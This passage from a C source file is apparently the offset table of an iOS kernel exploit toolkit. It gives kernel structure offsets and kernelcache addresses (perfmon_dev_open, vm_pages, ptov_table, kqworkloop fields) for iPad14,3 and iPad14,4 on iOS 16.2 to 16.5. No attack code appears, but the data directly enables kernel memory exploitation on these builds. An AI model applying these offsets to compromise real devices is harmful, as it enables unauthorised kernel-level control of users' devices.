0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E246", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E252", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:36 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8112", .build_version = "20F66", .device_id = "iPad14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa81288, .kernelcache__gPhysBase = 0xfffffe0007a8c100, .kernelcache__gPhysSize = 0xfffffe0007a8c100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a8a2d8, .kernelcache__perfmon_devices = 0xfffffe000aabf520, .kernelcache__perfmon_dev_open = 0xfffffe00080d9214, .kernelcache__ptov_table = 0xfffffe00079d7180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aabe990, .kernelcache__vm_pages = 0xfffffe00079d3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d6130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aabe988, .kernelcache__vn_kqfilter = 0xfffffe0008125d84, }, // iPad Pro 11 4th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:34 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8112", .build_version = "20C65", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a989190, .kernelcache__gPhysBase = 0xfffffe00079a80c8, .kernelcache__gPhysSize = 0xfffffe00079a80c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079a62a8, .kernelcache__perfmon_devices = 0xfffffe000a9c43b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcdd0, .kernelcache__ptov_table = 0xfffffe00078f3370, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9c3800, .kernelcache__vm_pages = 0xfffffe00078f0098, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2330, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9c37f8, .kernelcache__vn_kqfilter = 0xfffffe000810cdf8, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D47", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D67", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E246", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E252", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:36 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8112", .build_version = "20F66", .device_id = "iPad14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size 